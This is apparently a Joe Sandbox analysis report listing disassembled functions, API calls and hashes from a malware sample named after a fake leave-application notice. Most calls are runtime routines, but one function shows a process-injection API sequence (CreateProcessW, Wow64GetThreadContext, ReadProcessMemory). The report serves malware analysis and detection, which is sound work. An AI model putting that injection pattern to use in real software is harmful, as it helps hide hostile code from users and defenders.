                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                      • Instruction ID: 8f0fb8188ed41f39d54fba94710b0dbf8cad6da3c1e398078f4f43a3d43ed424
                                                      • Opcode Fuzzy Hash: 9be2b5beef45e3014043d3abdf219173afad32993680376f9e1db3d5b0d03a7e
                                                      • Instruction Fuzzy Hash: 68E0C2E9A0070242CA2065786F46FF333CC1F45331F04080DB419E3142CF28EC40A4B4
                                                      Function 00F82322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F822A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00F824F1), ref: 00F82303
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00F825A1
                                                      • CoInitialize.OLE32(00000000), ref: 00F82618
                                                      • CloseHandle.KERNEL32(00000000), ref: 00FF503A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 3815369404-0
                                                      • Opcode ID: 85ca7889b962f49ce0bfd708c8f3105b22556779a5a91615d652b64a85a0aed8
                                                      • Instruction ID: 0c47ac4b7b9691e7573971f71ff3b3d6a499e8b34fd9727d7e7b588a62e53385
                                                      • Opcode Fuzzy Hash: 85ca7889b962f49ce0bfd708c8f3105b22556779a5a91615d652b64a85a0aed8
                                                      • Instruction Fuzzy Hash: 6E71CFF89413418BC324EF5AE7D0498BBA4BB98340784822ED0C9C7399CB3E74A0DF54
                                                      Function 00FE0828 Relevance: 3.2, APIs: 2, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _strcat.LIBCMT ref: 00FE08FD
                                                        • Part of subcall function 00F8936C: __swprintf.LIBCMT ref: 00F893AB
                                                        • Part of subcall function 00F8936C: __itow.LIBCMT ref: 00F893DF
                                                      • _wcscpy.LIBCMT ref: 00FE098C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __itow__swprintf_strcat_wcscpy
                                                      • String ID:
                                                      • API String ID: 1012013722-0
                                                      • Opcode ID: ef19f0e7052173ab25cc01f25c08b9c715d1503496c3f32ba08029784fa346a7
                                                      • Instruction ID: 67ce1e3d5ce5a52ead80e4d8c72819060fdf48e561d6f26038832303a0a4d4ee
                                                      • Opcode Fuzzy Hash: ef19f0e7052173ab25cc01f25c08b9c715d1503496c3f32ba08029784fa346a7
                                                      • Instruction Fuzzy Hash: 4D915E35A00605DFCB18DF18C991AADB7E5FF49310B548069E85ACF352DB78ED41EB80
                                                      Function 00F83A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • IsThemeActive.UXTHEME ref: 00F83A73
                                                        • Part of subcall function 00FA1405: __lock.LIBCMT ref: 00FA140B
                                                        • Part of subcall function 00F83ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F83AF3
                                                        • Part of subcall function 00F83ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F83B08
                                                        • Part of subcall function 00F83D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00F83AA3,?), ref: 00F83D45
                                                        • Part of subcall function 00F83D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00F83AA3,?), ref: 00F83D57
                                                        • Part of subcall function 00F83D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,01041148,01041130,?,?,?,?,00F83AA3,?), ref: 00F83DC8
                                                        • Part of subcall function 00F83D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00F83AA3,?), ref: 00F83E48
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F83AB3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                      • String ID:
                                                      • API String ID: 924797094-0
                                                      • Opcode ID: cd6792336192eb174748faecaf96e0c13d155a22d36852c028357249c0a319f4
                                                      • Instruction ID: 4c50526b08ed49e2a57868f6eb390a4a50a974d296f67512bac5036825adfd9f
                                                      • Opcode Fuzzy Hash: cd6792336192eb174748faecaf96e0c13d155a22d36852c028357249c0a319f4
                                                      • Instruction Fuzzy Hash: C211D5B56083419FC310EF59E94595EFBE4FF94710F00491FF484832A1DB79A544DB92
                                                      Function 00FAE9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___lock_fhandle.LIBCMT ref: 00FAEA29
                                                      • __close_nolock.LIBCMT ref: 00FAEA42
                                                        • Part of subcall function 00FA7BDA: __getptd_noexit.LIBCMT ref: 00FA7BDA
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                      • String ID:
                                                      • API String ID: 1046115767-0
                                                      • Opcode ID: 11cc1a1c6d4803b25f11180937df24887eea6d4f1c1be17f31df3963bfea8011
                                                      • Instruction ID: a92eb25dfe60c07f9b5682b4525ccf019915e69170e317f4da3e57e77cd96ab1
                                                      • Opcode Fuzzy Hash: 11cc1a1c6d4803b25f11180937df24887eea6d4f1c1be17f31df3963bfea8011
                                                      • Instruction Fuzzy Hash: EF11ACF29096109BD322BF689D827593A606F83331F2A0340E4609F1E6CBBC9C01B7A1
                                                      Function 00F9F4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FA395C: __FF_MSGBANNER.LIBCMT ref: 00FA3973
                                                        • Part of subcall function 00FA395C: __NMSG_WRITE.LIBCMT ref: 00FA397A
                                                        • Part of subcall function 00FA395C: RtlAllocateHeap.NTDLL(01840000,00000000,00000001,00000001,00000000,?,?,00F9F507,?,0000000E), ref: 00FA399F
                                                      • std::exception::exception.LIBCMT ref: 00F9F51E
                                                      • __CxxThrowException@8.LIBCMT ref: 00F9F533
                                                        • Part of subcall function 00FA6805: RaiseException.KERNEL32(?,?,0000000E,01036A30,?,?,?,00F9F538,0000000E,01036A30,?,00000001), ref: 00FA6856
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 3902256705-0
                                                      • Opcode ID: 18c5388b7ebe37dd322053f2d679d180a92555babbd51df71a06ef58be06224c
                                                      • Instruction ID: 6417bebbc146a062462aa93394d1559ac20ac85120dc8d70281359860a729e7f
                                                      • Opcode Fuzzy Hash: 18c5388b7ebe37dd322053f2d679d180a92555babbd51df71a06ef58be06224c
                                                      • Instruction Fuzzy Hash: 76F0F47140020D67EB05FFDDDC019DE77ACAF02324F684025F948D2181CB759684E7B5
                                                      Function 00FA35E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • __lock_file.LIBCMT ref: 00FA3629
                                                        • Part of subcall function 00FA4E1C: __lock.LIBCMT ref: 00FA4E3F
                                                      • __fclose_nolock.LIBCMT ref: 00FA3634
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: f2d2a8534e043ac321a31ab79f1936f2966392bcb3520c09d998d7d09d6225ce
                                                      • Instruction ID: 09bacfd5ec2a9e60123f0c75b9484ac967891138c115883388e497a77b4934e3
                                                      • Opcode Fuzzy Hash: f2d2a8534e043ac321a31ab79f1936f2966392bcb3520c09d998d7d09d6225ce
                                                      • Instruction Fuzzy Hash: 4AF090F2D01204AAD711BF658C02B6E7AA06F53330F298108F420EB3C1CB7C9A41BE55
                                                      Function 01A4B07D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 01A4B83B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01A4B8D1
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01A4B8F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                      • Instruction ID: 2cfa43d9a713565365c99f4004d335761b84f934585e729687ca17aa5d3383ac
                                                      • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                      • Instruction Fuzzy Hash: C712BD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4E81CB5A
                                                      Function 00FA2957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __flush.LIBCMT ref: 00FA2A0B
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __flush__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 4101623367-0
                                                      • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                      • Instruction ID: db10ada71400649b4d125794f63e3e71e103046ff1dd09dadf7f0e74f0afacf6
                                                      • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                      • Instruction Fuzzy Hash: 014192B1B007069FDB689FADC8805AF77A6AF4A770F24852DE855C7240EB78DD41BB40
                                                      Function 00F9ED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 503b564bdb90c88c8c9349f1ac245b9321a9a29d3039a99c06f80ad61c9ef511
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 0331D675A00105DBEB18DF58C480A69FBB6FF49350B6486A6E809CB356DB31EDC1EB90
                                                      Function 00FE040F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 116d8a26fdb6399dc9c222242ea9b482d089d5d08bf6796c7e4ddf602a97e30c
                                                      • Instruction ID: c0265c399321a35f092e8ecfd9b471a01da3ca845426045e9f04b7b9d1049fc3
                                                      • Opcode Fuzzy Hash: 116d8a26fdb6399dc9c222242ea9b482d089d5d08bf6796c7e4ddf602a97e30c
                                                      • Instruction Fuzzy Hash: 6A31B276104A58DFCF01EF41D48176E7BB0FF48320F14844AE9951B385DBB4A945EF91
                                                      Function 00FF9A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: b5fe5ffa07f0da30f8b3e1daaca10440114232336ffea9cbe6305028a483d876
                                                      • Instruction ID: b80c9c71bec9e58603ab85e31faba740f77ad78da855b711eeda3438265ff3ea
                                                      • Opcode Fuzzy Hash: b5fe5ffa07f0da30f8b3e1daaca10440114232336ffea9cbe6305028a483d876
                                                      • Instruction Fuzzy Hash: E9417F745086018FEB24DF14C484B1ABBE0BF85318F19896CE99A4B362C776F845EF52
                                                      Function 00F841A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F84214: FreeLibrary.KERNEL32(00000000,?), ref: 00F84247
                                                      • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00F839FE,?,00000001), ref: 00F841DB
                                                        • Part of subcall function 00F84291: FreeLibrary.KERNEL32(00000000), ref: 00F842C4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load
                                                      • String ID:
                                                      • API String ID: 2391024519-0
                                                      • Opcode ID: ed848234250833e1626e801701fa30de7e0d72842df73f4966b71fe7fbbdbc1c
                                                      • Instruction ID: e2294b141f814f0f155bb8744f318b47685b9ed56fb63fe58384ea3acbacee44
                                                      • Opcode Fuzzy Hash: ed848234250833e1626e801701fa30de7e0d72842df73f4966b71fe7fbbdbc1c
                                                      • Instruction Fuzzy Hash: D1119431604207AADF10FB64DC06FEE77A59F40710F108429F596A61C1DA79AA04BB60
                                                      Function 00FF9B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 6d263825510c8683587858b7853adf760bfc232b3ccf2236e8b0553d021d2870
                                                      • Instruction ID: a7664b22bf487682241d5c7bbdf22043188d0020f8337a5288f637d2b44b64b1
                                                      • Opcode Fuzzy Hash: 6d263825510c8683587858b7853adf760bfc232b3ccf2236e8b0553d021d2870
                                                      • Instruction Fuzzy Hash: 65213974508601CFEB24DF64C444B1ABBE1BF85304F29496CEA9A4B261CB36F845EF52
                                                      Function 00FAAF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___lock_fhandle.LIBCMT ref: 00FAAFC0
                                                        • Part of subcall function 00FA7BDA: __getptd_noexit.LIBCMT ref: 00FA7BDA
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit$___lock_fhandle
                                                      • String ID:
                                                      • API String ID: 1144279405-0
                                                      • Opcode ID: dac3d2ae93b6242547670f84c1d8f7509548615a0eb9fd8f512ab13261097f26
                                                      • Instruction ID: bb44241b79b5cef85792967f8f6b5e1c50b732421ca1cbf93c4418fd89ca7a00
                                                      • Opcode Fuzzy Hash: dac3d2ae93b6242547670f84c1d8f7509548615a0eb9fd8f512ab13261097f26
                                                      • Instruction Fuzzy Hash: AC118FF28096409FD7267FA49C4275A3A60AF83331F1A8240E5745F1E7CBBD9D05BBA1
                                                      Function 00F839DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                      • Instruction ID: 262cd176a334c9d040567d76281cde4225543456ada66f86dd61957f62937e6a
                                                      • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                      • Instruction Fuzzy Hash: A501863150010EEECF45FF64CC928FEBB74EF10314F008029B525971A5EA34AB49EB60
                                                      Function 00FA2AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00FA2AED
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2597487223-0
                                                      • Opcode ID: 127840eb1bbaa6e8ccba033f1b7bcaeef8d4dd1067d43572c9d4cd8b2dd17ee5
                                                      • Instruction ID: 89336a9349ffc2265c6f7a9dace3b5035e9db8dd680f6512765cba415b73fa75
                                                      • Opcode Fuzzy Hash: 127840eb1bbaa6e8ccba033f1b7bcaeef8d4dd1067d43572c9d4cd8b2dd17ee5
                                                      • Instruction Fuzzy Hash: 8AF0CDB1A00215ABDF61BFA88C0279F3AA5BF42320F198415B8249A191C7BC8A52FB51
                                                      Function 00F84252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,?,?,?,00F839FE,?,00000001), ref: 00F84286
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
